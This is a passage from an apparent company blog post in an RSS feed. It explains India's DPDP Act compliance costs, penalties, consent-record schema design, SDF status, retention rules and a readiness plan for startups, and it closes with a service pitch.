&lt;td&gt;Zero unless notified as an SDF&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;General breach of other obligations&lt;/td&gt;
&lt;td&gt;Lower tiers&lt;/td&gt;
&lt;td&gt;Schedule to the Act&lt;/td&gt;
&lt;td&gt;Most likely category&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Two things founders misread here.&lt;/p&gt;

&lt;p&gt;The ₹250 crore number is a maximum, not a tariff. Penalties can also stack: one incident can be both a safeguards failure and a notification failure.&lt;/p&gt;

&lt;p&gt;The more useful observation is that the notification penalty is the one you fully control. A breach may happen despite good engineering. Missing the 72-hour report is a choice you made 18 months earlier when you decided not to instrument anything.&lt;/p&gt;

&lt;h2&gt;
  
  
  What vendors quote versus what it costs
&lt;/h2&gt;

&lt;p&gt;The published quotes vary by a factor of 400. That is not a market. That is an information gap.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Buyer profile&lt;/th&gt;
&lt;th&gt;Typical vendor quote&lt;/th&gt;
&lt;th&gt;What the same outcome costs built in-house&lt;/th&gt;
&lt;th&gt;Source of the quote&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Startup, under 10,000 users&lt;/td&gt;
&lt;td&gt;₹15 lakh to ₹2 crore&lt;/td&gt;
&lt;td&gt;Under ₹50,000 a year&lt;/td&gt;
&lt;td&gt;Consently, 2026&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SME, around 500,000 users&lt;/td&gt;
&lt;td&gt;₹15 lakh to ₹2 crore&lt;/td&gt;
&lt;td&gt;₹3 lakh to ₹8 lakh&lt;/td&gt;
&lt;td&gt;Consently, 2026&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;End-to-end consulting, startup or SME&lt;/td&gt;
&lt;td&gt;₹1.5 lakh to ₹2 lakh&lt;/td&gt;
&lt;td&gt;Varies&lt;/td&gt;
&lt;td&gt;TCSA, 2026&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;End-to-end consulting, mid-market&lt;/td&gt;
&lt;td&gt;₹2 lakh to ₹3 lakh&lt;/td&gt;
&lt;td&gt;Varies&lt;/td&gt;
&lt;td&gt;TCSA, 2026&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Enterprise or SDF programme&lt;/td&gt;
&lt;td&gt;₹3 lakh to ₹4 lakh&lt;/td&gt;
&lt;td&gt;Varies&lt;/td&gt;
&lt;td&gt;TCSA, 2026&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Treat every figure in that table with the incentive attached. Consently sells a consent management platform. TCSA sells DPDP consulting. Both figures come from companies whose revenue is the number they are quoting you. We are citing them because published neutral pricing for DPDP work does not exist, not because they are disinterested.&lt;/p&gt;

&lt;p&gt;The market context explains the spread. India's privacy and data governance market is around $1 billion to $1.5 billion today with the potential to reach $3 billion to $4 billion over the next decade, per Ashok Hariharan, founder of IDfy, speaking to Inc42. IDfy's own revenue from operations rose to ₹188.5 crore in FY25 from ₹145 crore in FY24, and crossed ₹200 crore in FY26. A market that size, growing that fast, in front of a hard deadline, produces exactly the quoting behaviour above.&lt;/p&gt;

&lt;h2&gt;
  
  
  Where the money actually goes
&lt;/h2&gt;

&lt;p&gt;Three cost centres, in the order they will actually consume budget.&lt;/p&gt;

&lt;p&gt;Consent infrastructure. A consent record needs to be immutable, timestamped, versioned against the notice text, and queryable per data principal. Most startups already have a users table and no consent table. This is a schema and an API, not a product.&lt;/p&gt;

&lt;p&gt;Data rights workflows. Access, correction and erasure requests need an owner, an SLA and an audit trail. This is where teams underestimate. Erasure is genuinely hard once data has fanned out into analytics, backups, logs, a data warehouse and three SaaS tools. The engineering cost is proportional to how many copies of personal data you made before anyone asked.&lt;/p&gt;

&lt;p&gt;Governance footprint. Policies, processor contracts, breach runbook, logging. Cheap in rupees, slow in calendar time, because it needs decisions rather than code.&lt;/p&gt;

&lt;p&gt;The real cost is almost never the consent banner. It is the erasure path through your data warehouse.&lt;/p&gt;

&lt;h2&gt;
  
  
  What you can build yourself
&lt;/h2&gt;

&lt;p&gt;For a startup under 10,000 users with no children's data and no SDF notification, the compliant core is smaller than the quotes suggest. A consent record is roughly this shape:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;create&lt;/span&gt; &lt;span class="k"&gt;table&lt;/span&gt; &lt;span class="n"&gt;consent_record&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;
  &lt;span class="n"&gt;id&lt;/span&gt;              &lt;span class="n"&gt;uuid&lt;/span&gt; &lt;span class="k"&gt;primary&lt;/span&gt; &lt;span class="k"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="n"&gt;data_principal&lt;/span&gt;  &lt;span class="n"&gt;uuid&lt;/span&gt; &lt;span class="k"&gt;not&lt;/span&gt; &lt;span class="k"&gt;null&lt;/span&gt; &lt;span class="k"&gt;references&lt;/span&gt; &lt;span class="n"&gt;users&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;id&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
  &lt;span class="n"&gt;purpose&lt;/span&gt;         &lt;span class="nb"&gt;text&lt;/span&gt; &lt;span class="k"&gt;not&lt;/span&gt; &lt;span class="k"&gt;null&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;          &lt;span class="c1"&gt;-- one row per purpose, never bundled&lt;/span&gt;
  &lt;span class="n"&gt;notice_version&lt;/span&gt;  &lt;span class="nb"&gt;text&lt;/span&gt; &lt;span class="k"&gt;not&lt;/span&gt; &lt;span class="k"&gt;null&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;          &lt;span class="c1"&gt;-- ties consent to the exact notice shown&lt;/span&gt;
  &lt;span class="n"&gt;status&lt;/span&gt;          &lt;span class="nb"&gt;text&lt;/span&gt; &lt;span class="k"&gt;not&lt;/span&gt; &lt;span class="k"&gt;null&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;          &lt;span class="c1"&gt;-- granted | withdrawn&lt;/span&gt;
  &lt;span class="n"&gt;granted_at&lt;/span&gt;      &lt;span class="n"&gt;timestamptz&lt;/span&gt; &lt;span class="k"&gt;not&lt;/span&gt; &lt;span class="k"&gt;null&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="n"&gt;withdrawn_at&lt;/span&gt;    &lt;span class="n"&gt;timestamptz&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="k"&gt;source&lt;/span&gt;          &lt;span class="nb"&gt;text&lt;/span&gt; &lt;span class="k"&gt;not&lt;/span&gt; &lt;span class="k"&gt;null&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;          &lt;span class="c1"&gt;-- signup | settings | consent_manager&lt;/span&gt;
  &lt;span class="n"&gt;evidence&lt;/span&gt;        &lt;span class="n"&gt;jsonb&lt;/span&gt; &lt;span class="k"&gt;not&lt;/span&gt; &lt;span class="k"&gt;null&lt;/span&gt;          &lt;span class="c1"&gt;-- ip, user agent, rendered notice hash&lt;/span&gt;
&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="k"&gt;create&lt;/span&gt; &lt;span class="k"&gt;index&lt;/span&gt; &lt;span class="k"&gt;on&lt;/span&gt; &lt;span class="n"&gt;consent_record&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;data_principal&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;purpose&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;status&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Two design rules do most of the compliance work. One row per purpose, because bundled consent is not consent under the Act's purpose limitation. And &lt;code&gt;notice_version&lt;/code&gt; with a hash of the rendered notice, because a year from now you must show what the person actually saw, not what your current privacy page says.&lt;/p&gt;

&lt;p&gt;Withdrawal has to be as easy as granting. That is a product decision more than an engineering one, and it is the item most likely to fail an audit.&lt;/p&gt;

&lt;p&gt;For Rule 7 readiness, the question to answer before May 2027 is narrow: if personal data leaked at 02:00 on a Sunday, how long until someone knows, and can you reconstruct the nature, extent, timing and affected-principal list within 72 hours? If the answer depends on grepping application logs by hand, that is your gap, and it is a detection and logging investment, not a legal one. Our notes on &lt;a href="https://ecorpit.com/privacy-first-ai-architecture-lessons-enterprise-2026/" rel="noopener noreferrer"&gt;privacy-first AI architecture&lt;/a&gt; cover the data-flow mapping that makes this answerable.&lt;/p&gt;

&lt;h2&gt;
  
  
  Are you a Significant Data Fiduciary? Probably not
&lt;/h2&gt;

&lt;p&gt;This is the single largest source of over-quoting, so it is worth being blunt.&lt;/p&gt;

&lt;p&gt;An SDF is not a size category you grow into. The Central Government notifies you. A data fiduciary that is not notified is not an SDF, even if it processes very large data volumes, and a fiduciary that is notified is an SDF from the date of notification irrespective of size.&lt;/p&gt;

&lt;p&gt;So the DPO, the DPIA, the annual audit and the algorithmic due diligence in Rule 13 are not on your roadmap unless you have been notified. If a proposal prices a DPO retainer and an annual audit for a Series A company that has not been notified, it is pricing obligations you do not have.&lt;/p&gt;

&lt;h2&gt;
  
  
  Retention: Schedule III mostly is not about you
&lt;/h2&gt;

&lt;p&gt;Schedule III sets default retention of three years from the last interaction, but only for named classes at real scale: e-commerce entities with at least 2 crore registered users, online gaming intermediaries with at least 50 lakh registered users, and social media intermediaries with at least 2 crore registered users.&lt;/p&gt;

&lt;p&gt;Below those thresholds, Rule 8's general principle applies instead: erase when the specified purpose is no longer served. That is a judgement your team documents, not a number the Rules hand you. The absence of a bright line is why this line item gets padded.&lt;/p&gt;

&lt;h2&gt;
  
  
  A 10-month plan from July 2026
&lt;/h2&gt;

&lt;p&gt;Months 1 to 2, discovery. Map every place personal data lands. Not the diagram you wish were true, the one your warehouse actually shows. Most teams find between three and ten copies they had forgotten.&lt;/p&gt;

&lt;p&gt;Months 3 to 4, consent and notice. Ship the consent schema, version the notice, unbundle purposes, build withdrawal.&lt;/p&gt;

&lt;p&gt;Months 5 to 7, rights and erasure. Build access, correction and erasure end to end, including the awkward paths: backups, analytics, third-party processors. Give it an owner and an SLA.&lt;/p&gt;

&lt;p&gt;Months 8 to 9, breach readiness. Detection, alerting, log retention, a runbook with named roles, and one tabletop exercise against the 72-hour clock. This is where Choudhary's tooling point converts into a purchase order.&lt;/p&gt;

&lt;p&gt;Month 10, contracts and evidence. Processor terms, records of processing, and the file you would hand the Board.&lt;/p&gt;

&lt;p&gt;Deliberately not on the list: registering as a Consent Manager, appointing a DPO, or commissioning an annual audit, unless you have been notified as an SDF. If your compliance spend is dominated by those three, someone sold you an enterprise programme for a startup problem.&lt;/p&gt;

&lt;h2&gt;
  
  
  India-specific considerations
&lt;/h2&gt;

&lt;p&gt;DPDP applies to processing of digital personal data within India, and to processing outside India where it relates to offering goods or services to data principals in India. A Delaware-registered startup with Indian users is in scope. Incorporation abroad is not an exemption.&lt;/p&gt;

&lt;p&gt;The Board operates as a digital office under Rule 20, so complaints and proceedings are online. That lowers the barrier for a complaint against a small company, which is the practical enforcement risk for startups: not a regulator-initiated sweep, but a single annoyed user who cannot get their data deleted.&lt;/p&gt;

&lt;p&gt;Sector overlays still apply on top. Healthcare AI deployments carry CDSCO considerations alongside DPDP, which we set out in our &lt;a href="https://ecorpit.com/healthcare-ai-india-cdsco-dpdp-deployment-steps-2026/" rel="noopener noreferrer"&gt;healthcare AI deployment guide&lt;/a&gt;, and public-sector AI work interacts with the IndiaAI Mission framework covered in our &lt;a href="https://ecorpit.com/india-sovereign-ai-indiaai-mission-dpdp-2026/" rel="noopener noreferrer"&gt;sovereign AI analysis&lt;/a&gt;. We design applications aligned with DPDP requirements rather than certifying compliance, because DPDP has no certification to hold.&lt;/p&gt;

&lt;h2&gt;
  
  
  FAQ
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;When is the DPDP compliance deadline for Indian startups?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Full compliance is due 13 May 2027. The DPDP Rules 2025 were notified on 13 November 2025 in three phases: the Data Protection Board of India was established immediately, Consent Manager registration and the penalty framework begin on 13 November 2026, and consent, notice, security, breach and rights obligations all apply from 13 May 2027.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How much does DPDP compliance actually cost a startup?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;It depends on scale and existing engineering hygiene. Consently's 2026 breakdown puts a startup under 10,000 users at under ₹50,000 a year and an SME with around 500,000 users at ₹3 lakh to ₹8 lakh, against typical market quotes of ₹15 lakh to ₹2 crore. Most of the gap is obligations you may not have.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What is the maximum penalty under the DPDP Act?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;₹250 crore for failing to take reasonable security safeguards where a breach follows. ₹200 crore applies for failing to notify the Board or affected data principals, and ₹200 crore for children's data failures. ₹150 crore covers additional Significant Data Fiduciary obligations. Penalties are maximums and can stack across a single incident.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Do I have to report a data breach within 72 hours?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Partly. Rule 7 requires intimation to each affected data principal and an initial description to the Board without delay, which is stricter than 72 hours. The detailed report to the Board is due within 72 hours of becoming aware, extendable only if the Board allows a longer period on written request.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Is my startup a Significant Data Fiduciary?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Almost certainly not. SDF status comes from Central Government notification, not from user counts or revenue. A fiduciary that is not notified is not an SDF regardless of data volume. Until notified, the Rule 13 obligations of DPO, impact assessment, annual audit and algorithmic due diligence do not apply to you.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Do I need to register as a Consent Manager?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;No, unless that is your business. A Consent Manager is a regulated intermediary, and Schedule I Part A requires incorporation in India plus a minimum net worth of ₹2 crore. Registration opens 13 November 2026. A typical D2C or SaaS company is a Data Fiduciary that may use a Consent Manager.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Does DPDP apply to a startup incorporated outside India?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Yes, where the processing relates to offering goods or services to data principals within India. Foreign incorporation is not an exemption, and the Act contains no revenue or headcount threshold. A two-person company carries the same baseline obligations as a large enterprise, with penalties applied proportionately.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How long can I retain personal data under DPDP?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Rule 8 requires erasure once the specified purpose is no longer served. Schedule III sets a three-year default only for named classes at scale: e-commerce and social media intermediaries with at least 2 crore registered users, and online gaming intermediaries with at least 50 lakh. Below those thresholds you document your own retention judgement.&lt;/p&gt;

&lt;h2&gt;
  
  
  How eCorpIT can help
&lt;/h2&gt;

&lt;p&gt;eCorpIT is a CMMI Level 5 certified, senior-led engineering organisation in Gurugram that treats DPDP as an engineering problem rather than a document exercise. We map where personal data actually lands, build consent and erasure paths that survive an audit, and get breach detection to the point where a 72-hour Rule 7 report is answerable. We design applications aligned with DPDP requirements and will tell you plainly which obligations do not apply to you. Talk to our team via &lt;a href="https://ecorpit.com/contact-us/" rel="noopener noreferrer"&gt;/contact-us/&lt;/a&gt; about a DPDP readiness review before the May 2027 deadline.&lt;/p&gt;

&lt;h2&gt;
  
  
  References
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;a href="https://www.dpdpa.com/dpdparules/rule7.html" rel="noopener noreferrer"&gt;Rule 7: Intimation of personal data breach&lt;/a&gt;. DPDP Rules 2025 text&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.dpdpa.in/dpdpa_rules_2025/Rule_4.htm" rel="noopener noreferrer"&gt;Rule 4: Registration and obligations of Consent Manager&lt;/a&gt;. DPDP Rules 2025 text&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.dpdpa.in/dpdpa_rules_2025/schedule1-A.htm" rel="noopener noreferrer"&gt;Schedule I Part A: Conditions of registration of Consent Manager&lt;/a&gt;. DPDP Rules 2025 text&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://inc42.com/features/indias-data-privacy-rules-will-dpdp-act-compliance-costs-crush-startups/" rel="noopener noreferrer"&gt;India's Data Privacy Rules: Will DPDP Act Compliance Costs Crush Startups?&lt;/a&gt;. Inc42, 19 November 2025&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://inc42.com/features/india-dpdpa-startups-privacy-compliance-costs-burden-law/" rel="noopener noreferrer"&gt;As DPDPA Kicks In, Are Startups Ready For Privacy Compliance Burden?&lt;/a&gt;. Inc42, 16 April 2026&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.consently.in/blog/dpdp-act-compliance-cost-india-2026" rel="noopener noreferrer"&gt;DPDP Act Compliance Cost in India: A Real Breakdown for Startups, SMEs and Enterprises&lt;/a&gt;. Consently, 2026&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.tcsa.in/services/consulting/dpdp-compliance-india" rel="noopener noreferrer"&gt;Top DPDP Act Compliance Consultants India&lt;/a&gt;. TCSA&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.tcsa.in/resources/dpdp-rules-2025-implementation-roadmap" rel="noopener noreferrer"&gt;DPDP Rules 2025: Compliance Roadmap and Deadlines&lt;/a&gt;. TCSA&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.azbpartners.com/bank/consent-managers-under-indias-dpdp-act-and-dpdp-rules/" rel="noopener noreferrer"&gt;Consent Managers under India's DPDP Act and DPDP Rules&lt;/a&gt;. AZB and Partners&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.amsshardul.com/insight/enforcement-of-the-dpdp-act-and-notification-of-the-dpdp-rules/" rel="noopener noreferrer"&gt;Enforcement of the DPDP Act and notification of the DPDP rules&lt;/a&gt;. Shardul Amarchand Mangaldas and Co&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.medianama.com/2025/11/223-dpdp-rules-2025-data-fiduciary-obligations/" rel="noopener noreferrer"&gt;How DPDP Rules 2025 Affect Data Fiduciaries and SDFs&lt;/a&gt;. Medianama, November 2025&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.lexology.com/library/detail.aspx?g=7e3af947-10aa-4712-bc1e-54179a613409" rel="noopener noreferrer"&gt;Digital Personal Data Protection Rules, 2025: operationalising consent, security and governance obligations&lt;/a&gt;. Lexology&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.scrut.io/post/dpdp-rules" rel="noopener noreferrer"&gt;India's DPDP Rules 2025: a practical guide with implementation checklist&lt;/a&gt;. Scrut&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.seclore.com/fundamentals/dpdp-rules-2025-compliance-guide/" rel="noopener noreferrer"&gt;DPDP Rules 2025: India's Complete Compliance Guide&lt;/a&gt;. Seclore&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://vakilsearch.com/article/significant-data-fiduciary-sdf/" rel="noopener noreferrer"&gt;Significant Data Fiduciary (SDF) Under DPDP Act: Complete Guide&lt;/a&gt;. Vakilsearch&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.glocertinternational.com/resources/guides/dpdp-act-and-rules-overview/" rel="noopener noreferrer"&gt;DPDP Act and Rules: Practical Overview, 2026 Edition&lt;/a&gt;. Glocert International&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://dpdpa.com/schedule/explanatorynote.html" rel="noopener noreferrer"&gt;Explanatory note to the Digital Personal Data Protection Rules, 2025&lt;/a&gt;. MeitY&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://dpdpa.com/schedule/schedule3.html" rel="noopener noreferrer"&gt;Schedule III: class of data fiduciaries, purposes and time periods&lt;/a&gt;. DPDP Rules 2025 text&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://dpdpa.com/dpdparules/rule8.html" rel="noopener noreferrer"&gt;Rule 8: Time period for specified purpose to be deemed as no longer being served&lt;/a&gt;. DPDP Rules 2025 text&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://dpdpa.com/dpdparules/rule13.html" rel="noopener noreferrer"&gt;Rule 13: Additional obligations of Significant Data Fiduciary&lt;/a&gt;. DPDP Rules 2025 text&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://dpdpa.com/dpdparules/rule3.html" rel="noopener noreferrer"&gt;Rule 3: Notice given by Data Fiduciary to Data Principal&lt;/a&gt;. DPDP Rules 2025 text&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://dpdpa.com/dpdparules/rule6.html" rel="noopener noreferrer"&gt;Rule 6: Reasonable security safeguards&lt;/a&gt;. DPDP Rules 2025 text&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://dpdpa.com/dpdparules/rule14.html" rel="noopener noreferrer"&gt;Rule 14: Rights of Data Principals&lt;/a&gt;. DPDP Rules 2025 text&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://dpdpa.com/dpdparules/rule20.html" rel="noopener noreferrer"&gt;Rule 20: Functioning of Board as digital office&lt;/a&gt;. DPDP Rules 2025 text&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://dpdpa.com/dpdpa_enforcement_timeline.html" rel="noopener noreferrer"&gt;DPDP Act 2023 and DPDP Rules 2025: enforcement timeline&lt;/a&gt;. DPDPA.com&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Last updated: 16 July 2026.&lt;/p&gt;

</description>
      <category>dpdp</category>
      <category>compliance</category>
      <category>dataprotection</category>
      <category>indianstartups</category>
    </item>
  </channel>
</rss>
